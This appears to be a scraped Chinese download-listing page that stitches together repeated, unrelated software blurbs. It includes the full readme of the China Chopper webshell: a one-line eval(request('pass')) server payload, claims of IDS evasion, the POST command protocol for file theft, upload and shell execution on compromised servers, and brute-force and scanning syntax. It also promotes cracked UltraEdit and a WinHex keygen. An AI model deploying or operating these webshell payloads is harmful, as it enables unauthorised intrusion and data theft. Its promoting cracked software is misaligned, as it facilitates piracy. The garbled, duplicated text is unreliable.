JAVA开发人员必备是HTML格式的JavaTM2PlatformStandardEdition6API规范本文档是Java2PlatformStandardEdition6.0的API规范。
请参见:描述Java2Platform软件包java.applet提供创建applet所必需的类和applet用来与其applet上下文通信的类。
java.awt包含用于创建用户界面和绘制图形图像的所有类。
java.awt.color提供用于颜色空间的类。
java.awt.datatransfer提供在应用程序之间和在应用程序内部传输数据的接口和类。
java.awt.dndDrag和Drop是一种直接操作动作,在许多图形用户界面系统中都会遇到它,它提供了一种机制,能够在两个与GUI中显示元素逻辑相关的实体之间传输信息。
java.awt.event提供处理由AWT组件所激发的各类事件的接口和类。
java.awt.font提供与字体相关的类和接口。
java.awt.geom提供用于在与二维几何形状相关的对象上定义和执行操作的Java2D类。
java.awt.im提供输入方法框架所需的类和接口。
java.awt.im.spi提供启用可以与Java运行时环境一起使用的输入方法开发的接口。
java.awt.image提供创建和修改图像的各种类。
java.awt.image.renderable提供用于生成与呈现无关的图像的类和接口。
java.awt.print为通用的打印API提供类和接口。
java.beans包含与开发beans有关的类,即基于JavaBeansTM架构的组件。
java.beans.beancontext提供与bean上下文有关的类和接口。
java.io通过数据流、序列化和文件系统提供系统输入和输出。
java.lang提供利用Java编程语言进行程序设计的基础类。
java.lang.annotation为Java编程语言注释设施提供库支持。
java.lang.instrument提供允许Java编程语言代理检测运行在JVM上的程序的服务。
java.lang.management提供管理接口,用于监视和管理Java虚拟机以及Java虚拟机在其上运行的操作系统。
java.lang.ref提供了引用对象类,支持在某种程度上与垃圾回收器之间的交互。
java.lang.reflect提供类和接口,以获得关于类和对象的反射信息。
java.math提供用于执行任意精度整数算法(BigInteger)和任意精度小数算法(BigDecimal)的类。
java.net为实现网络应用程序提供类。
java.nio定义作为数据容器的缓冲区,并提供其他NIO包的概述。
java.nio.channels定义了各种通道,这些通道表示到能够执行I/O操作的实体(如文件和套接字)的连接;
定义了用于多路复用的、非阻塞I/O操作的选择器。
java.nio.channels.spi用于java.nio.channels包的服务提供者类。
java.nio.charset定义用来在字节和Unicode字符之间转换的charset、解码器和编码器。
java.nio.charset.spijava.nio.charset包的服务提供者类。
java.rmi提供RMI包。
java.rmi.activation为RMI对象激活提供支持。
java.rmi.dgc为RMI分布式垃圾回收提供了类和接口。
java.rmi.registry提供RMI注册表的一个类和两个接口。
java.rmi.server提供支持服务器端RMI的类和接口。
java.security为安全框架提供类和接口。
java.security.acl此包中的类和接口已经被java.security包中的类取代。
java.security.cert提供用于解析和管理证书、证书撤消列表(CRL)和证书路径的类和接口。
java.security.interfaces提供的接口用于生成RSALaboratoryTechnicalNotePKCS#1中定义的RSA(Rivest、Shamir和AdlemanAsymmetricCipher算法)密钥,以及NIST的FIPS-186中定义的
请参见:描述Java2Platform软件包java.applet提供创建applet所必需的类和applet用来与其applet上下文通信的类。
java.awt包含用于创建用户界面和绘制图形图像的所有类。
java.awt.color提供用于颜色空间的类。
java.awt.datatransfer提供在应用程序之间和在应用程序内部传输数据的接口和类。
java.awt.dndDrag和Drop是一种直接操作动作,在许多图形用户界面系统中都会遇到它,它提供了一种机制,能够在两个与GUI中显示元素逻辑相关的实体之间传输信息。
java.awt.event提供处理由AWT组件所激发的各类事件的接口和类。
java.awt.font提供与字体相关的类和接口。
java.awt.geom提供用于在与二维几何形状相关的对象上定义和执行操作的Java2D类。
java.awt.im提供输入方法框架所需的类和接口。
java.awt.im.spi提供启用可以与Java运行时环境一起使用的输入方法开发的接口。
java.awt.image提供创建和修改图像的各种类。
java.awt.image.renderable提供用于生成与呈现无关的图像的类和接口。
java.awt.print为通用的打印API提供类和接口。
java.beans包含与开发beans有关的类,即基于JavaBeansTM架构的组件。
java.beans.beancontext提供与bean上下文有关的类和接口。
java.io通过数据流、序列化和文件系统提供系统输入和输出。
java.lang提供利用Java编程语言进行程序设计的基础类。
java.lang.annotation为Java编程语言注释设施提供库支持。
java.lang.instrument提供允许Java编程语言代理检测运行在JVM上的程序的服务。
java.lang.management提供管理接口,用于监视和管理Java虚拟机以及Java虚拟机在其上运行的操作系统。
java.lang.ref提供了引用对象类,支持在某种程度上与垃圾回收器之间的交互。
java.lang.reflect提供类和接口,以获得关于类和对象的反射信息。
java.math提供用于执行任意精度整数算法(BigInteger)和任意精度小数算法(BigDecimal)的类。
java.net为实现网络应用程序提供类。
java.nio定义作为数据容器的缓冲区,并提供其他NIO包的概述。
java.nio.channels定义了各种通道,这些通道表示到能够执行I/O操作的实体(如文件和套接字)的连接;
定义了用于多路复用的、非阻塞I/O操作的选择器。
java.nio.channels.spi用于java.nio.channels包的服务提供者类。
java.nio.charset定义用来在字节和Unicode字符之间转换的charset、解码器和编码器。
java.nio.charset.spijava.nio.charset包的服务提供者类。
java.rmi提供RMI包。
java.rmi.activation为RMI对象激活提供支持。
java.rmi.dgc为RMI分布式垃圾回收提供了类和接口。
java.rmi.registry提供RMI注册表的一个类和两个接口。
java.rmi.server提供支持服务器端RMI的类和接口。
java.security为安全框架提供类和接口。
java.security.acl此包中的类和接口已经被java.security包中的类取代。
java.security.cert提供用于解析和管理证书、证书撤消列表(CRL)和证书路径的类和接口。
java.security.interfaces提供的接口用于生成RSALaboratoryTechnicalNotePKCS#1中定义的RSA(Rivest、Shamir和AdlemanAsymmetricCipher算法)密钥,以及NIST的FIPS-186中定义的
2024/11/8 0:06:29
35.21MB
1
**密码机器v1.0**是一款专为CTF(CaptureTheFlag)竞赛设计的网页脚本工具,它集成了多种编码和加密方法,让用户在浏览器环境下就能轻松进行各种编码转换与解密操作。
这款工具的出现极大地提升了密码分析和网络安全领域中数据处理的效率,尤其对于那些需要频繁进行编码转换的场景,比如Web安全挑战、逆向工程或密码学研究。
我们来看看**编码转换**方面。
编码是计算机科学中基础且关键的概念,不同的编码方式决定了数据如何在数字世界中存储和传输。
常见的编码类型有ASCII、Unicode(包括UTF-8、UTF-16等)、Base64等。
在CTF比赛中,可能会遇到需要将字符串从一种编码转换为另一种的情况,例如,从ASCII转换为UTF-8,或者通过Base64编码隐藏信息。
密码机器v1.0提供了这些功能,使得参赛者可以快速解码或编码,以揭示隐藏的信息。
**加密方式**是密码学的核心。
此工具可能包含了对称加密(如AES、DES)、非对称加密(RSA、ECC)、哈希函数(MD5、SHA系列)、消息认证码(MAC)、伪随机数生成器(PRNG)以及各种密码算法的变种。
在CTF中,解密任务通常涉及找出密文的正确加密算法,然后使用正确的密钥还原原文。
密码机器v1.0提供了一站式的加密/解密平台,使得这个过程变得简单易行。
此外,**密码学技巧**在CTF中也至关重要,例如,XOR运算常常被用于简单的加解密操作,而字典攻击、蛮力攻击、生日攻击等破解策略也是解决加密问题时常用的方法。
密码机器v1.0可能内置了这些攻击模式,帮助用户快速测试各种可能性,提高解密效率。
不仅如此,此工具可能还支持**混淆和编码隐藏**技术,如HTML实体编码、URL编码、JavaScript混淆等,这些都是CTF中常见的障眼法。
通过解混淆和解码,我们可以揭示被隐藏的信息。
密码机器v1.0是一款强大的密码学工具,它整合了多种编码、加密、解密和攻击手段,是CTF爱好者和信息安全专业人士不可或缺的助手。
使用时,只需在浏览器中打开,无需安装任何软件,简单易用,大大降低了密码学应用的技术门槛,提高了工作效率。
无论是在学习密码学原理,还是在实际的网络安全挑战中,都能发挥重要作用。
这款工具的出现极大地提升了密码分析和网络安全领域中数据处理的效率,尤其对于那些需要频繁进行编码转换的场景,比如Web安全挑战、逆向工程或密码学研究。
我们来看看**编码转换**方面。
编码是计算机科学中基础且关键的概念,不同的编码方式决定了数据如何在数字世界中存储和传输。
常见的编码类型有ASCII、Unicode(包括UTF-8、UTF-16等)、Base64等。
在CTF比赛中,可能会遇到需要将字符串从一种编码转换为另一种的情况,例如,从ASCII转换为UTF-8,或者通过Base64编码隐藏信息。
密码机器v1.0提供了这些功能,使得参赛者可以快速解码或编码,以揭示隐藏的信息。
**加密方式**是密码学的核心。
此工具可能包含了对称加密(如AES、DES)、非对称加密(RSA、ECC)、哈希函数(MD5、SHA系列)、消息认证码(MAC)、伪随机数生成器(PRNG)以及各种密码算法的变种。
在CTF中,解密任务通常涉及找出密文的正确加密算法,然后使用正确的密钥还原原文。
密码机器v1.0提供了一站式的加密/解密平台,使得这个过程变得简单易行。
此外,**密码学技巧**在CTF中也至关重要,例如,XOR运算常常被用于简单的加解密操作,而字典攻击、蛮力攻击、生日攻击等破解策略也是解决加密问题时常用的方法。
密码机器v1.0可能内置了这些攻击模式,帮助用户快速测试各种可能性,提高解密效率。
不仅如此,此工具可能还支持**混淆和编码隐藏**技术,如HTML实体编码、URL编码、JavaScript混淆等,这些都是CTF中常见的障眼法。
通过解混淆和解码,我们可以揭示被隐藏的信息。
密码机器v1.0是一款强大的密码学工具,它整合了多种编码、加密、解密和攻击手段,是CTF爱好者和信息安全专业人士不可或缺的助手。
使用时,只需在浏览器中打开,无需安装任何软件,简单易用,大大降低了密码学应用的技术门槛,提高了工作效率。
无论是在学习密码学原理,还是在实际的网络安全挑战中,都能发挥重要作用。
2024/11/5 19:46:12
16KB
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30
197KB
1
UltraEdit【版本26.20.0.46】免安装,解压即可永久使用!主要功能轻松打开并编辑大型文件-4GB及更大文件!多插入符号编辑和多选列(块)模式编辑强大的搜索:在文件中查找和替换、正则表达式、反向搜索等文件比较几乎所有编程语言的代码语法突出显示代码折叠和分层功能列表美化且重新格式化源代码强大的XML处理:XML树视图、重新格式化、验证等自动关闭XML/HTML标记智能模板-自动智能代码完成编辑主题-浏览整个应用程序强大且可配置的工具文件和数据排序集成FTP客户(支持FTP、SFTP和FTPS)集成SSH/Telnet客户端经筛选的拼写检查程序Unicode/……等等
2024/10/7 3:56:01
87.39MB
1
WinHex是一款16进制编辑器。
在电脑取证、数据恢复、底层数据处理以及IT安全等领域方面很有用,可以查看和编辑所有类型的文件,及从数码相机卡和系统文件已崩溃的硬盘中恢复被删除的文件或丢失的数据。
主要特性:*磁盘编辑,可适用:硬盘、软盘、CD-ROM、DVD、ZIP、SmartMedia和CF等;
*强大的FAT、NTFS、Ext2/3、ReiserFS、CDFS、UDF目录浏览器;
*内存编辑:可访问其它进程的虚拟内存;
*用模板编辑数据结构(例如修复分区表WinHex_16.2.rar/启动扇区);*连接、分割文件,合并、划分奇偶字节/字;
*分析、比较文件;
*灵活的搜索和替换功能;
*磁盘克隆;
*驱动器镜像及备份(可压缩或按650M分割);*API及脚本功能;
*128位加密、校验和、CRC32、哈希散列(MD5,SHA-1,...);
*擦除机密文件以保护数据或隐私;
*导入所有剪贴簿格式,包括ASCII16进制值;
*在二进制、16位ASCII码、IntelHex和MotorolaS间相互转换;
*ANSIASCII,IBMASCII,EBCDIC,(Unicode)字符集;
*即时窗口切换,打印,随机数生成器;
*支持大于4G的文件。
内含ZWT的注册机(有部分垃圾杀毒软件会报毒,实际上没有任何问题,请放心使用。
其实内附user.txt已经含有注册信息!)界面使用简体中文的方法:Help菜单-setup-ChinesePlease!
在电脑取证、数据恢复、底层数据处理以及IT安全等领域方面很有用,可以查看和编辑所有类型的文件,及从数码相机卡和系统文件已崩溃的硬盘中恢复被删除的文件或丢失的数据。
主要特性:*磁盘编辑,可适用:硬盘、软盘、CD-ROM、DVD、ZIP、SmartMedia和CF等;
*强大的FAT、NTFS、Ext2/3、ReiserFS、CDFS、UDF目录浏览器;
*内存编辑:可访问其它进程的虚拟内存;
*用模板编辑数据结构(例如修复分区表WinHex_16.2.rar/启动扇区);*连接、分割文件,合并、划分奇偶字节/字;
*分析、比较文件;
*灵活的搜索和替换功能;
*磁盘克隆;
*驱动器镜像及备份(可压缩或按650M分割);*API及脚本功能;
*128位加密、校验和、CRC32、哈希散列(MD5,SHA-1,...);
*擦除机密文件以保护数据或隐私;
*导入所有剪贴簿格式,包括ASCII16进制值;
*在二进制、16位ASCII码、IntelHex和MotorolaS间相互转换;
*ANSIASCII,IBMASCII,EBCDIC,(Unicode)字符集;
*即时窗口切换,打印,随机数生成器;
*支持大于4G的文件。
内含ZWT的注册机(有部分垃圾杀毒软件会报毒,实际上没有任何问题,请放心使用。
其实内附user.txt已经含有注册信息!)界面使用简体中文的方法:Help菜单-setup-ChinesePlease!
2024/10/4 4:04:44
2.27MB
1
实测打开16G大文本,功能强大1.支持大文件。
您可以用它来编辑,上传,下载,加密和解密超过4G的文件。
2.支持UNICODE文件:ANSI,UTF-8,UTF-16andUTF-16bigendian。
您也可以用PilotEdit来改变文件编码。
3.支持DOS和UNIX文件。
4.支持回行显示和二进制编辑方式。
界面非常友好。
5.可以编辑FTP文件。
PilotEdit支持上传和下载FTP文件和目录。
6.支持多行查找和替换。
7.可以比较文件和目录。
8.支持基于正则表达式的查找和替换。
9.自定义脚本可以避免重复劳动。
10.支持C/C++,Java,SQL,shell等文件类型并可以自定义文件类型。
11.您可以通过如下方式把PilotEdit改成中文版:选择菜单“Configure-->SetLanguageFile…”,选择C:\DocumentsandSettings\\ApplicationData\PilotEdit\SCH.RC后重新启动PilotEdit.12.支持自定义字符串表,可以通过单击添加自定义的字符串。
13.完美支持中文14.基于256位AES的文件加密和解密的功能。
可以一次对多个文件和目录加密。
15.排序,查找/删除重复的行。
16.强大的文件比较和并功能...
您可以用它来编辑,上传,下载,加密和解密超过4G的文件。
2.支持UNICODE文件:ANSI,UTF-8,UTF-16andUTF-16bigendian。
您也可以用PilotEdit来改变文件编码。
3.支持DOS和UNIX文件。
4.支持回行显示和二进制编辑方式。
界面非常友好。
5.可以编辑FTP文件。
PilotEdit支持上传和下载FTP文件和目录。
6.支持多行查找和替换。
7.可以比较文件和目录。
8.支持基于正则表达式的查找和替换。
9.自定义脚本可以避免重复劳动。
10.支持C/C++,Java,SQL,shell等文件类型并可以自定义文件类型。
11.您可以通过如下方式把PilotEdit改成中文版:选择菜单“Configure-->SetLanguageFile…”,选择C:\DocumentsandSettings\\ApplicationData\PilotEdit\SCH.RC后重新启动PilotEdit.12.支持自定义字符串表,可以通过单击添加自定义的字符串。
13.完美支持中文14.基于256位AES的文件加密和解密的功能。
可以一次对多个文件和目录加密。
15.排序,查找/删除重复的行。
16.强大的文件比较和并功能...
2024/9/25 18:33:11
35.79MB
1
1.插件文档2.使用说明2.1项目字符集选择:未设置2.1.1使用方法2.1.2存在问题2.2项目字符集选择:UNICODE2.2.1使用方法2.2.2存在问题3.皮肤信息说明配合说明:https://blog.csdn.net/qq_41498261/article/details/113311856
2024/9/23 6:40:05
138.12MB
1
